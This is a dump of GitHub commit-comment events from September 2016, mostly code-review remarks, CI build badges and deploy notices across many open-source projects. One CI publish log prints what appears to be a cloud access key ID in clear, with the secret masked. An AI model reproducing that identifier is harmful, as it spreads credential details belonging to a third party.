{"id":"4638481487","type":"CommitCommentEvent","actor":{"login":"karlnapf"},"repo":{"name":"karlnapf/kernel_exp_family"},"payload":{"comment":{"id":19227135,"position":39,"line":128,"path":"kernel_exp_family/estimators/full/gaussian.py","commit_id":"5135d8cfa3c884f773f3fbd029738bf59f443f95","created_at":"2016-09-29T16:43:42Z","updated_at":"2016-09-29T16:43:42Z","body":"I don't understand the `np.dot(g2, g2)`, isnt the fisher score just taking the sum of the second derivatives?"}},"created_at":"2016-09-29T16:43:42Z"}
{"id":"4638482879","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19227137,"position":null,"line":null,"path":null,"commit_id":"07702595005fbc8474653ed80995914f5caef8e1","created_at":"2016-09-29T16:43:57Z","updated_at":"2016-09-29T16:43:57Z","body":"\nBuild report #163772917 for sha 07702595005fbc8474653ed80995914f5caef8e1:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%287/7%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-19.42%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3753%20/%2010048%20%2837.35%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.81%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-29T16:43:57Z"}
{"id":"4638483366","type":"CommitCommentEvent","actor":{"login":"jamiesprax"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19227138,"position":54,"line":592,"path":"atlas-api/src/main/java/org/atlasapi/query/QueryWebModule.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-29T16:44:02Z","updated_at":"2016-09-29T16:44:02Z","body":"Is this an existing bug in the code? \r\n\r\nREGIONS -> new **Platform**Annotation()\r\nPLATFORM -> new **Regions**Annoation()"}},"created_at":"2016-09-29T16:44:02Z"}
{"id":"4638483501","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"pedrobaeza/l10n-spain"},"payload":{"comment":{"id":19227139,"position":20,"line":219,"path":"l10n_es_facturae/views/report_facturae.xml","commit_id":"52727240f0fac20f571de34939cb413e70628146","created_at":"2016-09-29T16:44:04Z","updated_at":"2016-09-29T16:44:04Z","body":"El anterior código del filtered hace exactamente lo mismo. ¿Por qué lo quitas?"}},"created_at":"2016-09-29T16:44:04Z"}
{"id":"4638484671","type":"CommitCommentEvent","actor":{"login":"gabrielhenz"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19227145,"position":29,"line":29,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"ea60f5328d7dbd0e794e2378698899567ceff690","created_at":"2016-09-29T16:44:17Z","updated_at":"2016-09-29T16:44:17Z","body":"Commit de refatoração feito, obrigado pela instrução."}},"created_at":"2016-09-29T16:44:17Z"}
{"id":"4638491510","type":"CommitCommentEvent","actor":{"login":"tthuem"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19227162,"position":null,"line":null,"path":null,"commit_id":"1d5d9ffdfba0969358a2a263073f811a5b2505be","created_at":"2016-09-29T16:45:19Z","updated_at":"2016-09-29T16:45:19Z","body":"\"// TODO Auto-generated method stub\"\r\n\r\ndoes not make sense in final code"}},"created_at":"2016-09-29T16:45:19Z"}
{"id":"4638496496","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19227182,"position":null,"line":null,"path":null,"commit_id":"b8af43fcaf404dc778b834e4bb8883c219e9eae8","created_at":"2016-09-29T16:46:10Z","updated_at":"2016-09-29T16:46:10Z","body":"👍 "}},"created_at":"2016-09-29T16:46:10Z"}
{"id":"4638501467","type":"CommitCommentEvent","actor":{"login":"LazyTroll"},"repo":{"name":"igorektest/SyntaxAnalysator"},"payload":{"comment":{"id":19227199,"position":5,"line":5,"path":"main.cpp","commit_id":"e57366f2f7578d1b04cfae74084e41ed439a7482","created_at":"2016-09-29T16:46:59Z","updated_at":"2016-09-29T16:46:59Z","body":"Интересно...)"}},"created_at":"2016-09-29T16:46:59Z"}
{"id":"4638501600","type":"CommitCommentEvent","actor":{"login":"gabrielhenz"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19227202,"position":20,"line":44,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"e48e418b1a17dcee664dabe2fa15898188a601a1","created_at":"2016-09-29T16:47:01Z","updated_at":"2016-09-29T16:47:01Z","body":"Commit de refatoração feito, obrigado pela instrução. =D"}},"created_at":"2016-09-29T16:47:01Z"}
{"id":"4638502287","type":"CommitCommentEvent","actor":{"login":"wopox1337"},"repo":{"name":"shelru/vermillion_hack"},"payload":{"comment":{"id":19227206,"position":13,"line":18,"path":"MiniBase/leis/_player.cpp","commit_id":"adbda876bffca85f1c3ba93566fc0e4781df3a40","created_at":"2016-09-29T16:47:08Z","updated_at":"2016-09-29T16:47:08Z","body":"Whooops! :)"}},"created_at":"2016-09-29T16:47:08Z"}
{"id":"4638504332","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19227212,"position":10,"line":23,"path":"host.lua","commit_id":"c5ce248f54695316d4603c18b7e5e485b2564d24","created_at":"2016-09-29T16:47:28Z","updated_at":"2016-09-29T16:47:28Z","body":"Unreachable code. The code above still resets counter to zero when it reaches 100."}},"created_at":"2016-09-29T16:47:28Z"}
{"id":"4638505529","type":"CommitCommentEvent","actor":{"login":"ArsenArsen"},"repo":{"name":"BroManDudeGuyPhD/SirBroBot"},"payload":{"comment":{"id":19227217,"position":null,"line":null,"path":null,"commit_id":"089639f8fc0ba353bb71109dba2d28e2706f22c6","created_at":"2016-09-29T16:47:41Z","updated_at":"2016-09-29T16:47:41Z","body":"Its still fine, may I recommend getting youtube-dl.exe off of there tho?"}},"created_at":"2016-09-29T16:47:41Z"}
{"id":"4638506339","type":"CommitCommentEvent","actor":{"login":"deadlight"},"repo":{"name":"ubuntudesign/www.ubuntu.com"},"payload":{"comment":{"id":19227222,"position":null,"line":null,"path":null,"commit_id":"ec4f8f3a14829ad904776e1e2f7fe284e8b23f6a","created_at":"2016-09-29T16:47:51Z","updated_at":"2016-09-29T16:47:51Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [High Availability Training - build](https://trello.com/c/TXJuuJGX/1772-high-availability-training-build)"}},"created_at":"2016-09-29T16:47:51Z"}
{"id":"4638508069","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19227226,"position":37,"line":50,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8c96b26fd28cdef59b89f8516697cb40ca4761e9","created_at":"2016-09-29T16:48:10Z","updated_at":"2016-09-29T16:48:10Z","body":"Fiz algumas alterações: \r\n- Removi o método perderVida e o ganharExperiencia deixando para o próprio método receberFlecha atualizar esses atributos;\r\n- Removi também o retorno booleano do receberFlecha. \r\nAcredito que agora esteja ok."}},"created_at":"2016-09-29T16:48:10Z"}
{"id":"4638508984","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19227229,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T16:48:19Z","updated_at":"2016-09-29T16:48:19Z","body":"Certo, corrigi o método construtor e passei como parâmetro um objeto do tipo DataTerceiraEra."}},"created_at":"2016-09-29T16:48:19Z"}
{"id":"4638511788","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19227234,"position":null,"line":null,"path":null,"commit_id":"eccccba0ce4e2d627cbe2adb1bf4a692d595ca99","created_at":"2016-09-29T16:48:47Z","updated_at":"2016-09-29T16:48:47Z","body":"Two remarks:\r\n\r\na) during search depth can never be zero because of the assert in line 554\r\n````\r\n    assert(DEPTH_ZERO < depth && depth < DEPTH_MAX);\r\n````\r\nso in fact depth is never zero in step 6 neither and the value of razor_margin[0], which is currently 486, is never used and is irrelevant (we could as well put razor_margin[0] = 0)\r\n\r\nb) so your modification in line 732 is only fired when depth = 1, and \r\n\r\n  • indeed it is a non-functional change *if razor_margin[3] <= razor_margin[1]*.\r\n\r\n  • if razor_margin[3] > razor_margin[1], then the removal of line 732 is a functional change."}},"created_at":"2016-09-29T16:48:47Z"}
{"id":"4638512146","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19227236,"position":24,"line":24,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"741e51d64bcad23a66fee2eb44890153e2166c7d","created_at":"2016-09-29T16:48:51Z","updated_at":"2016-09-29T16:48:51Z","body":"Criei a variável para armazenar o resultado."}},"created_at":"2016-09-29T16:48:51Z"}
{"id":"4638512752","type":"CommitCommentEvent","actor":{"login":"9il"},"repo":{"name":"dlang/phobos"},"payload":{"comment":{"id":19227239,"position":14,"line":13,"path":"std/experimental/ndslice/internal.d","commit_id":"a5e935370f5de590532bb5d12610c865343f56a9","created_at":"2016-09-29T16:48:56Z","updated_at":"2016-09-29T16:48:56Z","body":"> This paragraph seems rather hard to understand. Are you saying that the functions here aren't actually influenced by fastmath themselves, but is expected to be merged with code that is during inlining, so you mark them as fastmath such as not to disallow certain optimisations allowed by the function-level LLVM flag?\r\n\r\nYes\r\n\r\n> That you use the name fmb instead of fastmath purely on psychological grounds such as not to scare users?\r\n\r\nYes"}},"created_at":"2016-09-29T16:48:56Z"}
{"id":"4638516410","type":"CommitCommentEvent","actor":{"login":"dr-j"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19227267,"position":null,"line":null,"path":null,"commit_id":"927d00299847eeeebd17b4518e33046bb77ef3d7","created_at":"2016-09-29T16:49:32Z","updated_at":"2016-09-29T16:49:32Z","body":"Faction 12 = Stormwind?\r\n\r\nAlliance players cannot complete this quest?\r\n\r\nServerToClient: SMSG_UPDATE_OBJECT (0x1792) Length: 330 ConnIdx: 2 Time: 08/12/2014 20:39:30.016 Number: 12141\r\nMap: 571\r\nCount: 2\r\n[0] UpdateType: Values\r\n[0] GUID: Full: 0xF130608900AB73B5 Type: Creature Entry: 24713 Low: 11236277\r\n[0] UNIT_FIELD_FACTIONTEMPLATE: 14/1.961818E-44\r\n[0] UNIT_FIELD_FLAGS: 559104/7.834716E-40\r\n[0] UNIT_NPC_FLAGS: 0/0\r\n"}},"created_at":"2016-09-29T16:49:32Z"}
{"id":"4638516742","type":"CommitCommentEvent","actor":{"login":"mikeubell"},"repo":{"name":"caciviclab/disclosure-backend-static"},"payload":{"comment":{"id":19227271,"position":null,"line":null,"path":null,"commit_id":"301ac911f88008a2bc6a167e9874e849a71724f6","created_at":"2016-09-29T16:49:36Z","updated_at":"2016-09-29T16:49:36Z","body":"Thanks for catching this."}},"created_at":"2016-09-29T16:49:36Z"}
{"id":"4638517578","type":"CommitCommentEvent","actor":{"login":"tareqobaida"},"repo":{"name":"alalamin25/msnb"},"payload":{"comment":{"id":19227273,"position":7,"line":29,"path":"settings/base.py","commit_id":"3804fc434753b1f17b95402912f61b106513a259","created_at":"2016-09-29T16:49:44Z","updated_at":"2016-09-29T16:49:44Z","body":"Please don't delete/modify anything from basic settings."}},"created_at":"2016-09-29T16:49:44Z"}
{"id":"4638518141","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19227286,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T16:49:50Z","updated_at":"2016-09-29T16:49:50Z","body":"Вы очень зацикливаетесь на экономии памяти, если бы это было НАСТОЛЬКО важно, мы бы все писали на C или C++ и двигали бы байты руками\r\nЕсть области где это действительно важно (микроконтроллеры) но там не пишут на C# "}},"created_at":"2016-09-29T16:49:50Z"}
{"id":"4638518915","type":"CommitCommentEvent","actor":{"login":"F03SD"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19227288,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T16:49:57Z","updated_at":"2016-09-29T16:49:57Z","body":"@Aokromes What the Guid range for Legion ? around 400000 - xxxxxx ?"}},"created_at":"2016-09-29T16:49:57Z"}
{"id":"4638527786","type":"CommitCommentEvent","actor":{"login":"BrightspaceGitHubReader"},"repo":{"name":"Brightspace/ifrau"},"payload":{"comment":{"id":19227326,"position":null,"line":null,"path":null,"commit_id":"e9139c23abe6b4cbeebeb08d38707451d9420b35","created_at":"2016-09-29T16:51:32Z","updated_at":"2016-09-29T16:51:32Z","body":"Publish options:\n\n   Target directory: ifrau\n   Module type: lib\n   Files: ./dist/**/*.js\n   Publish key: AKIAIFWDFE37W7LZ52XQ\n   Publish secret: [secret]\n   Dev tag: undefined\n   Version: v0.18.1\n\nPublished to:\n\n   https://s.brightspace.com/lib/ifrau/0.18.1/\n\n[16:51:31] [SUCCESS] /home/travis/build/Brightspace/ifrau/dist/ifrau.js.gz -> lib/ifrau/0.18.1/ifrau.js\n[16:51:31] [SUCCESS] /home/travis/build/Brightspace/ifrau/dist/ifrau/host.js.gz -> lib/ifrau/0.18.1/ifrau/host.js\n[16:51:32] [SUCCESS] /home/travis/build/Brightspace/ifrau/dist/ifrau/client.js.gz -> lib/ifrau/0.18.1/ifrau/client.js\n"}},"created_at":"2016-09-29T16:51:32Z"}
{"id":"4638528654","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19227328,"position":null,"line":null,"path":null,"commit_id":"33723b471757d30ef9cd4de3fcf826595ced4ee4","created_at":"2016-09-29T16:51:40Z","updated_at":"2016-09-29T16:51:40Z","body":"1973-AddDualDuctTerminals (cai799174) - Win64-Windows-7-VisualStudio-12: Tests Failed (2175 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-33723b471757d30ef9cd4de3fcf826595ced4ee4-PR2358-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.88%25-red.svg)</a> \n"}},"created_at":"2016-09-29T16:51:40Z"}
{"id":"4638532729","type":"CommitCommentEvent","actor":{"login":"zigomir"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":19227336,"position":null,"line":null,"path":null,"commit_id":"e632a65d3967a019670cb98a4015fe04678fd9eb","created_at":"2016-09-29T16:52:23Z","updated_at":"2016-09-29T16:52:23Z","body":"This was removed so Windows users can develop with local templates too. Why do we need a slash for local templates otherwise?"}},"created_at":"2016-09-29T16:52:23Z"}
{"id":"4638534637","type":"CommitCommentEvent","actor":{"login":"yang-g"},"repo":{"name":"grpc/grpc"},"payload":{"comment":{"id":19227344,"position":5,"line":907,"path":"src/core/ext/transport/chttp2/transport/chttp2_transport.c","commit_id":"35e87838a7f58c640da1e8c2b6d77c81dce8364f","created_at":"2016-09-29T16:52:41Z","updated_at":"2016-09-29T16:52:41Z","body":"I think you need to move block [912, 915] above line 905 for this to work?"}},"created_at":"2016-09-29T16:52:41Z"}
{"id":"4638535843","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19227349,"position":null,"line":null,"path":null,"commit_id":"5d5b72972628f6751b581860233f775d8a5925b3","created_at":"2016-09-29T16:52:55Z","updated_at":"2016-09-29T16:52:55Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/73e65a6213ea81e77eed1e6cea518dd2a9162a47/source/docs/assets/css/main.css)\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/5d5b72972628f6751b581860233f775d8a5925b3/source/docs/assets/js/main.js)\n- [source/docs/assets/t1commands.json](https://github.com/pantheon-systems/documentation/commit/5d5b72972628f6751b581860233f775d8a5925b3/source/docs/assets/t1commands.json)\n"}},"created_at":"2016-09-29T16:52:55Z"}
{"id":"4638536700","type":"CommitCommentEvent","actor":{"login":"tareqobaida"},"repo":{"name":"alalamin25/msnb"},"payload":{"comment":{"id":19227352,"position":20,"line":157,"path":"settings/base.py","commit_id":"3804fc434753b1f17b95402912f61b106513a259","created_at":"2016-09-29T16:53:05Z","updated_at":"2016-09-29T16:53:05Z","body":"If you don't need them, delete them before committing. Separation between celery settings and other settings is a good idea."}},"created_at":"2016-09-29T16:53:05Z"}
{"id":"4638538744","type":"CommitCommentEvent","actor":{"login":"Undergarun"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19227360,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T16:53:27Z","updated_at":"2016-09-29T16:53:27Z","body":"Ok, now i am understanding how you work on tc guys, thank you."}},"created_at":"2016-09-29T16:53:27Z"}
{"id":"4638542742","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19227366,"position":12,"line":108,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/KtPostfixTemplateProvider.kt","commit_id":"aecbb56d82537990fea1b7be06964417282a6b42","created_at":"2016-09-29T16:54:10Z","updated_at":"2016-09-29T16:54:10Z","body":"I think statementsOnly was a better name. topLevelOnly might be misleading and be thought as template is applicable for top level declarations only."}},"created_at":"2016-09-29T16:54:10Z"}
{"id":"4638543263","type":"CommitCommentEvent","actor":{"login":"samosaara"},"repo":{"name":"busting-cases/Eco-C"},"payload":{"comment":{"id":19227367,"position":17,"line":17,"path":"src/app.coffee","commit_id":"a77676a1a159c08e40f2aaee3a7e6a284af10d53","created_at":"2016-09-29T16:54:16Z","updated_at":"2016-09-29T16:54:16Z","body":"MariaDB é um 'clone' de MySQL que funciona mais rápido com a mesma sintaxe, e é open source."}},"created_at":"2016-09-29T16:54:16Z"}
{"id":"4638547300","type":"CommitCommentEvent","actor":{"login":"elacunza"},"repo":{"name":"pedrobaeza/l10n-spain"},"payload":{"comment":{"id":19227375,"position":null,"line":null,"path":null,"commit_id":"52727240f0fac20f571de34939cb413e70628146","created_at":"2016-09-29T16:55:00Z","updated_at":"2016-09-29T16:55:00Z","body":"Da este error:\r\nQWebException: \"global name 'invoice' is not defined\" while evaluating\r\n'invoice.move_id.line_id.filtered(lambda x: x.account_id == invoice.account_id)'"}},"created_at":"2016-09-29T16:55:00Z"}
{"id":"4638555697","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19227394,"position":3,"line":3,"path":"README.md","commit_id":"bbc4f47380390a5855b786efa645eceb4fc40edb","created_at":"2016-09-29T16:56:32Z","updated_at":"2016-09-29T16:56:32Z","body":"hello-world"}},"created_at":"2016-09-29T16:56:32Z"}
{"id":"4638559250","type":"CommitCommentEvent","actor":{"login":"ctiller"},"repo":{"name":"grpc/grpc"},"payload":{"comment":{"id":19227409,"position":5,"line":907,"path":"src/core/ext/transport/chttp2/transport/chttp2_transport.c","commit_id":"35e87838a7f58c640da1e8c2b6d77c81dce8364f","created_at":"2016-09-29T16:57:09Z","updated_at":"2016-09-29T16:57:09Z","body":"I think this is actually better: it prints the on_complete that was passed down, instead of the bogus one we create when nothing was passed down.\r\n\r\nWe probably need to do some cleanup at some point to make not passing an on_complete a fatal error..."}},"created_at":"2016-09-29T16:57:09Z"}
{"id":"4638560274","type":"CommitCommentEvent","actor":{"login":"kiliemanjaro"},"repo":{"name":"kiliemanjaro/miniature-telegram"},"payload":{"comment":{"id":19227412,"position":null,"line":null,"path":null,"commit_id":"13116cc6c41597463274dd643d874db0e6ff81f7","created_at":"2016-09-29T16:57:19Z","updated_at":"2016-09-29T16:57:19Z","body":"https://github.com/kiliemanjaro/miniature-telegram/blob/master/README.md"}},"created_at":"2016-09-29T16:57:19Z"}
{"id":"4638561603","type":"CommitCommentEvent","actor":{"login":"retrohacker"},"repo":{"name":"nodejs/docker-node"},"payload":{"comment":{"id":19227413,"position":24,"line":24,"path":"docs/BestPractices.md","commit_id":"0e0c74ad89870df855ecb8fa4e440c1bf030a0e3","created_at":"2016-09-29T16:57:33Z","updated_at":"2016-09-29T16:57:33Z","body":"@rjmunro yes! You can use `USER app`. You can choose to specify the user in the Dockerfile or at runtime. This can be paired with namespaces as of docker 1.10 which lets you map the UID of the user in the container to a non-privilaged user outside the container. https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-user-namespace-options"}},"created_at":"2016-09-29T16:57:33Z"}
{"id":"4638563522","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19227420,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T16:57:54Z","updated_at":"2016-09-29T16:57:54Z","body":"Cherry pick my commits for device tree and related commits on build opt/telephony and apps/carfierconfig repos and baseband will work, at least for gsm, don't know if works for cdma and locked bootloaders variants, as no one reported me anything after my latest changes "}},"created_at":"2016-09-29T16:57:54Z"}
{"id":"4638563883","type":"CommitCommentEvent","actor":{"login":"kmonson"},"repo":{"name":"zbeech/volttron"},"payload":{"comment":{"id":19227421,"position":null,"line":null,"path":null,"commit_id":"176034fff6eb40081e8b22e7874311576b06c9d5","created_at":"2016-09-29T16:57:58Z","updated_at":"2016-09-29T16:57:58Z","body":"Oh, durrr, reading is hard."}},"created_at":"2016-09-29T16:57:58Z"}
{"id":"4638566109","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19227424,"position":null,"line":null,"path":null,"commit_id":"55d9dbe6db93bff38485546cc28b77f81739b56a","created_at":"2016-09-29T16:58:21Z","updated_at":"2016-09-29T16:58:21Z","body":"Why DISABLE_CIL=y? secilc is being built in Android now."}},"created_at":"2016-09-29T16:58:21Z"}
{"id":"4638572140","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19227440,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T16:59:29Z","updated_at":"2016-09-29T16:59:29Z","body":"English plsssss to lazy to translate"}},"created_at":"2016-09-29T16:59:29Z"}
{"id":"4638572497","type":"CommitCommentEvent","actor":{"login":"vitalyp"},"repo":{"name":"it-persona/parus"},"payload":{"comment":{"id":19227442,"position":33,"line":33,"path":"src/UserBundle/Providers/VkOAuthProvider.php","commit_id":"2b98ac477a208ddd71bb3d5fde9dadc5023c09e4","created_at":"2016-09-29T16:59:33Z","updated_at":"2016-09-29T16:59:33Z","body":"прикольно фигачишь сетеры!"}},"created_at":"2016-09-29T16:59:33Z"}
{"id":"4638573433","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"pedrobaeza/l10n-spain"},"payload":{"comment":{"id":19227447,"position":null,"line":null,"path":null,"commit_id":"52727240f0fac20f571de34939cb413e70628146","created_at":"2016-09-29T16:59:44Z","updated_at":"2016-09-29T16:59:44Z","body":"Vaya, ya, efectivamente QWeb no pasa como contexto las variables establecidas con t-set en el filtered (antes lo hacía, pero lo desactivaron como medida de seguridad).\r\n\r\nVale, ¿puedes por favor poner un comentario para recordar ese problema cuando veamos el código?"}},"created_at":"2016-09-29T16:59:44Z"}
{"id":"4638573906","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19227448,"position":null,"line":null,"path":null,"commit_id":"d186f99bda77db8b75b804df0f403380d0ced19c","created_at":"2016-09-29T16:59:49Z","updated_at":"2016-09-29T16:59:49Z","body":"![Uploading Hydrangeas.jpg…]()\r\n"}},"created_at":"2016-09-29T16:59:49Z"}
{"id":"4638582498","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19227467,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T17:01:23Z","updated_at":"2016-09-29T17:01:23Z","body":"Yes yes I will...I just didn't spend time yet.I got ur device tree edits .the telephony stuff is missing.thanks for all :)"}},"created_at":"2016-09-29T17:01:23Z"}
{"id":"4638582952","type":"CommitCommentEvent","actor":{"login":"joachimprinzbach"},"repo":{"name":"joachimprinzbach/TypescriptAngularSample"},"payload":{"comment":{"id":19227469,"position":null,"line":null,"path":null,"commit_id":"d18feebb5d6fdc0afcd98f42c558478198d3d861","created_at":"2016-09-29T17:01:28Z","updated_at":"2016-09-29T17:01:28Z","body":"Bringt der Type hier einen Mehrwert? Ich denke nicht. Daher hatte ich ihn weggelassen ;-) \r\nDas ist genau der Boilerplate, den man doch vermeiden möchte - oder?"}},"created_at":"2016-09-29T17:01:28Z"}
{"id":"4638588610","type":"CommitCommentEvent","actor":{"login":"kennux"},"repo":{"name":"spacechase0/StardewValleyMP"},"payload":{"comment":{"id":19227486,"position":null,"line":null,"path":null,"commit_id":"683aebdb11dc48e5ae8ef0e044f5429e35a196c4","created_at":"2016-09-29T17:02:31Z","updated_at":"2016-09-29T17:02:31Z","body":"A maybe easier approach to this is waiting until the savegame is loaded before trying to send its data.\r\nYou can then just re-serialize the loaded one using SaveGame.serializer"}},"created_at":"2016-09-29T17:02:31Z"}
{"id":"4638593003","type":"CommitCommentEvent","actor":{"login":"rlanger"},"repo":{"name":"Brightspace/d2l-icons-ui"},"payload":{"comment":{"id":19227497,"position":5,"line":39,"path":"d2l-icon-button-shared-styles.html","commit_id":"5a08f117ab29ff1594740176763a3b3541e17565","created_at":"2016-09-29T17:03:21Z","updated_at":"2016-09-29T17:03:21Z","body":"The requirements for text may be different than for other elements -- as far as I've been able to determine, 0.5 is the standard for icons and form components. "}},"created_at":"2016-09-29T17:03:21Z"}
{"id":"4638596005","type":"CommitCommentEvent","actor":{"login":"AchimTuran"},"repo":{"name":"AchimTuran/xbmc"},"payload":{"comment":{"id":19227502,"position":4,"line":44,"path":"project/cmake/scripts/common/AddonHelpers.cmake","commit_id":"8295db89387dcd643994798e7815b576215ceeee","created_at":"2016-09-29T17:03:56Z","updated_at":"2016-09-29T17:03:56Z","body":"No problem!\r\nI also didn't had much time this week.\r\n\r\n`CORE_SOURCE_DIR` didn't worked for me. But that was before you merged this commit into mainline: https://github.com/xbmc/xbmc/commit/c7e85c8e426af7e83878a32a6fe8e6c9446c22c1.\r\nI will try it again and ping you if it doesn't work.\r\n\r\n"}},"created_at":"2016-09-29T17:03:56Z"}
{"id":"4638606675","type":"CommitCommentEvent","actor":{"login":"Edditoria"},"repo":{"name":"DiscoverMeteor/Microscope"},"payload":{"comment":{"id":19227522,"position":null,"line":null,"path":null,"commit_id":"6181c4b4e313f7bf52a4686b8c2a95924e8d26b6","created_at":"2016-09-29T17:05:56Z","updated_at":"2016-09-29T17:05:56Z","body":"Thanks @JeremyIglehart for explanation."}},"created_at":"2016-09-29T17:05:56Z"}
{"id":"4638607245","type":"CommitCommentEvent","actor":{"login":"leskal"},"repo":{"name":"JonnyXDA/android_kernel_elephone_p9000"},"payload":{"comment":{"id":19227526,"position":null,"line":null,"path":null,"commit_id":"804fbda95224250bb100f83c71ee8777bc6ac9ea","created_at":"2016-09-29T17:06:01Z","updated_at":"2016-09-29T17:06:01Z","body":"drivers/misc/mediatek/gyroscope/lsm6ds3gy/built-in.o:(.bss+0x18): multiple definition of `gyro_cust'\r\ndrivers/misc/mediatek/gyroscope/mpu6050gy-new/built-in.o:(.bss+0x30): first defined here\r\nscripts/Makefile.build:336: recipe for target 'drivers/misc/mediatek/gyroscope/built-in.o' failed\r\nmake[4]: *** [drivers/misc/mediatek/gyroscope/built-in.o] Error 1\r\nscripts/Makefile.build:402: recipe for target 'drivers/misc/mediatek/gyroscope' failed\r\nmake[3]: *** [drivers/misc/mediatek/gyroscope] Error 2\r\nmake[3]: *** Waiting for unfinished jobs....\r\n"}},"created_at":"2016-09-29T17:06:01Z"}
